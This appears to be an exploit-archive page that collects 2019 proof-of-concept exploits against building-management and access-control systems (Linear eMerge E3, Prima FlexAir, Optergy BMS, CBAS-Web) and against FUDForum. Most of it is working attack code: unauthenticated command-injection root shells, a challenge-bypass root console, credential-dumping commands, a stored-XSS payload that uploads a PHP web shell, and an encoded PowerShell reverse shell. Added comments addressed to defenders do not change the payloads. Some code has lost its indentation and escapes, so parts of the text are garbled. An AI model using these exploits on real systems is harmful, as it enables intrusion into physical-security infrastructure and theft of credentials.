Nortek Linear eMerge E3 suffers from a cross-site request forgery (CSRF) vulnerability.

MD5 | f71c4e9823f6f1c6a4f6c324fdf7a349


Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery

CVE: CVE-2019-7262
Advisory: https://applied-risk.com/resources/ar-2019-005
Discovered by Gjoko 'LiquidWorm' Krstic








































Prima FlexAir Access Control version 2.3.35 database backup predictable name exploit.

MD5 | 1549dfc10ce0890c7b4cd26ea0d2fab6

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# CVE: CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#

import os#######
import sys######
import time#####
import requests#

from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Script name, used only to build the usage text below.
piton = os.path.basename(sys.argv[0])

# NOTE(review): indentation was lost in this listing; the three prints and
# sys.exit() presumably form the body of this `if` (no target argument given).
if len(sys.argv) < 2:
print '[+] Usage: '+piton+' [target]'
print '[+] Target example 1: http://10.0.0.17:8080'
print '[+] Target example 2: https://primanova.tldn'
sys.exit()

# Target base URL, taken verbatim from the command line (scheme and port
# included). It is concatenated into request URLs without any validation.
host = sys.argv[1]

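def datum(start_date, end_date):
    """Yield each calendar date from start_date up to, not including, end_date.

    Args:
        start_date: first ``datetime.date`` to yield.
        end_date: exclusive upper bound.

    Yields:
        Consecutive ``datetime.date`` values one day apart. Nothing is yielded
        when end_date is on or before start_date.
    """
    # The listing had lost the body's indentation, which made the definition a
    # syntax error; the block structure is restored here. timedelta.days is
    # already an int, so the original int() cast is dropped.
    for n in range((end_date - start_date).days):
        yield start_date + timedelta(n)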

# Hard-coded search window for the backup date embedded in the file name.
# The window covers 1093 days, so the whole candidate name space is roughly a
# thousand URLs: a date-derived file name gives the backup no secrecy at all.
start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print '[+] Please wait while fetchin the backup config file...'

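def spinning_cursor():
    """Yield the characters of a console progress spinner forever.

    Yields:
        '|', '/', '-' and a backslash in turn, repeating without end.
    """
    # The listing showed the literal as '|/-\' (an unterminated string, since
    # the backslash escapes the closing quote) and had lost the indentation.
    # The backslash is escaped here so the four spinner frames are intact.
    while True:
        for cursor in '|/-\\':
            yield cursor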

# Main loop: request one date-stamped backup URL per day in the search window
# and stop at the first HTTP 200.
#
# NOTE(review): indentation was lost in this listing; the statements after the
# `for` and `if` headers presumably form their bodies.
#
# Reviewer notes for defenders:
# - Root cause shown here: the configuration backup is reachable over HTTP
#   with no credentials sent, under a name derived only from a calendar date.
# - Log signature: one client issuing a run of GETs for
#   /links/Nova_Config_YYYY-MM-DD.bck with consecutive dates, about ten per
#   second (0.1 s sleep), almost all answered with a non-200 status.
# - Only the /links/...bck form is probed below. The header of this script
#   lists two further locations (/Nova/assets/...bck and /links/...pdb3), so
#   log reviews should cover those paths as well.
# - The header transcript shows the database holding login names and password
#   hashes, and the title says a hash is accepted for login; after any
#   exposure, treat all accounts as compromised and rotate credentials.
# - The header gives 2.4 as the fixed version.
spinner = spinning_cursor()

for mooshoo in datum(start_date, end_date):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('b')
# verify=False turns off TLS certificate validation for this request.
h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)

# Only the status code is checked; the body is not inspected before it is
# written to disk.
if (h.status_code) == 200:
print '[+] Found some juice!'
print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
timestr = time.strftime('%H%M%S')
time.sleep(1)
# The response body is saved under a local name that carries the backup date
# and the current wall-clock time; the file handle is never closed explicitly.
open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
sys.exit()

# Reached only when no date in the window produced a 200.
print '[-] No backup for you today. :('


FUDForum version 3.0.9 suffers from remote code execution and stored cross site scripting vulnerabilities.

MD5 | 85fcbef86c0f69e85d73a2d8f71402a2

// Exploit Title         : FUDForum 3.0.9 - Stored XSS / Remote Code Execution
// Date : 10/26/19
// Exploit Author : liquidsky (JMcPeters)
// Vulnerable Software : FUDForum 3.0.9
// Vendor Homepage : https://sourceforge.net/projects/fudforum/
// Version : 3.0.9
// Software Link : https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
// Tested On : Windows / mysql / apache
// Author Site : https://github.com/fuzzlove/FUDforum-XSS-RCE
// Demo : https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
// CVE : CVE-2019-18839, CVE-2019-18873
//
// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
// The areas impacted are the admin panel and the forum.
//
// XSS via username in Forum:
// 1. Register an account and log in to the forum.
// 2. Go to the user control panel. -> Account Settings -> change login
// 3. Insert javascript payload
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
// XSS via user-agent in Admin Panel:
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
// 3. curl -A '' http://target.machine/fudforum/index.php
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//

// Schedules grabShell() to run once, 5000 ms after this call.
// The string form of setTimeout is evaluated as code when the timer fires.
// NOTE(review): the delay presumably gives the upload request time to finish
// before the uploaded file is requested; the return value `u` is never used.
function patience()
{
var u=setTimeout("grabShell()",5000);
}

// This function requests the uploaded PHP script (liquidsky.php) to trigger the reverse shell.
// The embedded payload (a URL-encoded `powershell -EncodedCommand` string passed in `cmd`) will need to be modified.
function grabShell()
{
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42
%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%4
3%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.send(null);

}

// Builds a multipart/form-data body by hand and POSTs it to the forum's admin
// file browser (/fudforum/adm/admbrowse.php), asking it to store a PHP file
// named liquidsky.php in the directory given by `currentdir`.
//
// token: value sent as the "SQ" form field. The caller reads it from an admin
//        page, so it is presumably the admin session / anti-CSRF token.
//
// Reviewer notes for defenders:
// - Per the description above, this script runs inside the administrator's
//   browser through stored XSS, so the request is same-origin and the token
//   check on the admin form does not stop it. The fix belongs where the login
//   name and User-Agent are rendered (output encoding), not in the upload form.
// - Indicators: a POST to /fudforum/adm/admbrowse.php whose "fname" part has a
//   .php file name, and a new liquidsky.php (or any unexpected .php file) in
//   the forum directory.
// - The uploaded file passes a request parameter straight to system(); any
//   later request to it carrying a `cmd` parameter is command execution.
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", '/fudforum/adm/admbrowse.php', true);

// Send the proper header information along with the request
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");

// Hard-coded to the author's Windows/XAMPP test install ("Tested On" above).
var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
var fileName = "liquidsky.php";
// `url`, `ctype`-independent: `url` and `fileSize` below are assigned but never read.
var url = "/fudforum/adm/admbrowse.php";
var ctype = "application/x-php";
var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '
'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '

'; die; }?>";
var boundary = "-----------------------------9703186584101745941654835853";
var fileSize = fileData.length;

// Form fields sent, in order: cur (target directory), SQ (token), fname (the
// file part), tmp_f_val, d_name (destination name), file_upload (submit).
var body = "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="cur"rnrn';
body += currentdir + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="SQ"rnrn';
body += token + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"rn';
body += "Content-Type: " + ctype + "rnrn";
body += fileData + "rnrn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="tmp_f_val"rnrn';
body += "1" + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="d_name"rnrn';
body += fileName + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="file_upload"rnrn';
body += "Upload File" + 'rn';
body += "--" + boundary + "--";

xhr.send(body);
}

// Entry point of the injected script: fetch an admin page, read a token from
// it, hand the token to submitFormWithTokenJS(), then start the delayed
// follow-up request via patience().
//
// Reviewer notes for defenders:
// - The GET goes to a relative admin URL, so it is sent with whatever session
//   the viewing browser holds. Per the description above that viewer is the
//   administrator, which is why an ordinary user's stored input ends up acting
//   with admin rights.
// - Because the script is same-origin it can read the page and its token;
//   per-form tokens do not mitigate stored XSS. Encoding user-controlled
//   values on output, and a Content-Security-Policy that blocks inline and
//   third-party script on admin pages, address the cause.
//Grab SQ token
var req = new XMLHttpRequest();

req.onreadystatechange=function()
{
// readyState 4 with status 200: the admin page has fully loaded.
if (req.readyState == 4 && req.status == 200) {
var htmlPage = req.responseXML; /* fetch html */
// Takes the first <input> element in the document and uses its value as the
// token; NOTE(review): presumably that element is the hidden SQ field.
var SQ = htmlPage.getElementsByTagName("input")[0]
submitFormWithTokenJS(SQ.value);
}
}

req.open("GET", "/fudforum/adm/admuser.php", true);
// Ask the browser to parse the response as a DOM document (responseXML).
req.responseType = "document";
req.send();

patience();


Linear eMerge E3 versions 1.00-06 and below suffer from a privilege escalation vulnerability.

MD5 | e87096213609cedfeb448ae0ae5459f5


Linear eMerge E3 Privilege Escalation
Affected version: <=1.00-06
CVE: CVE-2019-7258, CVE-2019-7259
Advisory: https://applied-risk.com/resources/ar-2019-005

by Gjoko 'LiquidWorm' Krstic


Escalate:

curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1


Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1


Optergy BMS versions 2.0.3a and below account reset and username disclosure exploit.

MD5 | a1f66a4c127348cbe47ec39981351c17


Optergy BMS Account Reset and Username Disclosure

Affected version <=2.0.3a (Proton and Enterprise)
Discovered by Gjoko 'LiquidWorm' Krstic

CVE: CVE-2019-7272
Advisory: https://applied-risk.com/resources/ar-2019-008

PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
djuro
teppi
view
alerton
stef
humba
drmio
de3
andri
myko
dzonka
kosto
beebee
Administrator


Optergy BMS versions 2.0.3a and below unauthenticated remote root exploit. Related CVE number: CVE-2019-7276.

MD5 | 828db05389246ed7db50064512079555

#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# CVE: CVE-2019-7276
# Advisory: https://applied-risk.com/resources/ar-2019-008
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os#######
import sys######
import json#####
import hashlib##
import requests#

# Flat script: fetch a "challenge" from the console endpoint, derive the
# "answer" from it, and POST an operator-typed command together with both.
#
# NOTE(review): indentation was lost in this listing; the statements after the
# `if`, `while`, `try` and `except` headers presumably form their bodies.
#
# Reviewer notes for defenders:
# - The answer is computed from the challenge alone:
#   sha1(challenge) in hex, followed by md5 of that hex string. No secret or
#   credential enters the calculation, so the challenge-response exchange does
#   not authenticate anyone; whoever can reach the endpoint can answer it.
# - Every command is sent with a "sudo " prefix, and the header transcript
#   shows `id` returning uid=0.
# - Indicators: a GET to /tools/ajax/ConsoleResult.html?get followed by a POST
#   to /tools/ajax/ConsoleResult.html carrying `command`, `challenge` and
#   `answer` form fields. The User-Agent below is specific to this script and
#   easily changed, so it is only a weak indicator.
# - The header lists versions <=2.0.3a (Proton and Enterprise) as affected; it
#   does not name a fixed release. Until a vendor fix is confirmed, the web
#   interface should not be reachable from untrusted networks.
piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print 'nx20x20[*] Usage: '+piton+' n'
sys.exit()

while True:

# A fresh challenge is requested for every command.
challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'

try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge

# answer = hex(sha1(challenge)) + hex(md5(hex(sha1(challenge))))
hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2

zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
zeCommand = raw_input('# ')
if zeCommand.strip() == 'exit':
sys.exit()
zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
'Accept' : '*/*',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'keep-alive',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'command' : 'sudo '+zeCommand,
'challenge' : challenge,
'answer' : h1+h2}

zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
get_resp = json.loads(zeRequest.text)
get_answ = get_resp['response']['message']
print get_answ
# Any failure (network error, non-JSON reply, missing key) ends the loop with
# a generic message; the underlying error is not reported.
except Exception:
print '[*] Error!'
break


Computrols CBAS-Web versions 19.0.0 and below suffer from a reflected cross-site scripting (XSS) vulnerability.

MD5 | 98ed5bd8f8a9dd9b41007dd8458f785d


Computrols CBAS-Web Unauthenticated Reflected XSS

Affected versions: 19.0.0 and below
CVE: CVE-2019-10846
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic

--

POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1

username=">confirm(document.cookie)&submit_button=Send+Me+a+New+Password+Via+Email

=======

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=">htmlinjection&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

=======

GET /cbas/index.php?m=auth&a=login&username=">my milkshake brings all the boys to the yard.&password=damn_right HTTP/1.1


Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.

MD5 | 44a9793e2a7284d735e5ee358d786e4b

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time####
import sys#####
import os######
import re######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '''
.....
.e$$$$$$$$$$$$$$e.
z$$ ^$$$$$$$$$$$$$$$$$.
.$$$* J$$$$$$$$$$$$$$$$$$$e
.$" .$$$$$$$$$$$$$$$$$$$$$$*-
.$ $$$$$$$$$$$$$$$$***$$ .ee"
z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -e$$ 4$$$$. .ze$$$""""
4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
$$$$$$$$ .$$$$$$$$$$$**$$$$*"
z$$" $$ $$$$P*"" J$*$$c
$$" $$F .$$$ $$ ^$$
$$ *$$c.z$$$ $$ $$
$P $$$$$$$ 4$F 4$
dP *$$$" $$ '$r
.$ J$" $"
$ $P 4$
F $$ 4$
4$% 4$
$$ 4$
d$" $$
$P $$
$$ $$
4$% $$
$$ $$
d$ $$
$F "3
r=4e=" ... ..rf . ""%
$**$*"^""=..^4*=4=^"" ^"""
'''
print 'nx20x20[+] Linear eMerge E3 Remote Root Exploit'
print 'x20x20[-] by lqwrm (c) 2019'
print 'nx20x20[*] Usage: '+piton+' n'
sys.exit()

# Flat script body: optionally read the web front-end credentials, then loop
# sending operator-typed commands through card_scan_decoder.php and reading
# the output back from a file in the webroot.
#
# NOTE(review): indentation was lost in this listing; the statements after the
# `if`, `while`, `try` and `except` headers presumably form their bodies.
#
# Reviewer notes for defenders:
# - Root cause shown here: text placed between URL-encoded backticks (%60) in
#   the `door` query parameter is executed by a shell on the device, and no
#   credentials or session are sent with the request.
# - The header transcript shows the commands running as user lighttpd with
#   gid 0, and the front-end ID/password being read in clear text from
#   /tmp/SpiderDB/Spider.db. After any suspected hit, rotate those
#   credentials as well as fixing the device.
# - Indicators: GET requests to /card_scan_decoder.php whose query string
#   contains %60; GET requests to /test.txt; a test.txt file in the webroot.
#   The cleanup at the end is best-effort, so the file may be left behind.
# - The header lists versions <=1.00-06 as affected and names no fixed
#   release; keep the controller's web interface off untrusted networks.
ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
# Shell pipeline that pulls the ID and Password fields out of the device's
# SQLite file with grep/cut.
frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
showme = requests.get('http://'+ipaddr+'/test.txt')
print showme.text

while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
# Output is redirected to test.txt, which is then fetched over HTTP: the
# webroot is writable by the web server user and serves the file back.
execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
#time.sleep(1);
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
# The typed text has already been sent to the device before this check.
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!n"
break
else: continue
# Any error ends the session silently.
except Exception:
break

sys.exit()


Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan.php.

MD5 | 6bc7028052702f5b76c1733414371eb8

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys,os##

# Flat script: loop sending operator-typed commands through card_scan.php and
# reading the output back from a file in the webroot.
#
# NOTE(review): indentation was lost in this listing; the statements after the
# `if`, `while`, `try` and `except` headers presumably form their bodies.
#
# Reviewer notes for defenders:
# - Root cause shown here: text placed between URL-encoded backticks (%60) in
#   the `ReaderNo` query parameter is executed by a shell on the device, and
#   no credentials or session are sent with the request.
# - The header transcript shows the commands running as user lighttpd with
#   gid 0.
# - Indicators: GET requests to /card_scan.php whose query string contains
#   %60; GET requests to /test.txt; a test.txt file in the webroot. Cleanup
#   happens only when the operator types "exit", so the file may remain.
# - The header lists versions <=1.00-06 as affected and names no fixed
#   release; keep the controller's web interface off untrusted networks.
piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print 'nx20x20[*] Usage: '+piton+' n'
sys.exit()

ipaddr = sys.argv[1]

print
while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
# Output is redirected to test.txt, which is then fetched over HTTP: the
# webroot is writable by the web server user and serves the file back.
execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60')
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
# The typed text has already been sent to the device before this check.
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!n"
break
else: continue
# Any error ends the session silently.
except Exception:
break

sys.exit()


Linear eMerge E3 versions 1.00-06 and below arbitrary file upload remote root code execution exploit.

MD5 | 7cb54d49b3539c9a3b2258832481a863

#!/usr/bin/env python
#
# Linear eMerge E3 Arbitrary File Upload Remote Root Code Execution
# Affected version: <=1.00-06
# CVE: CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password:
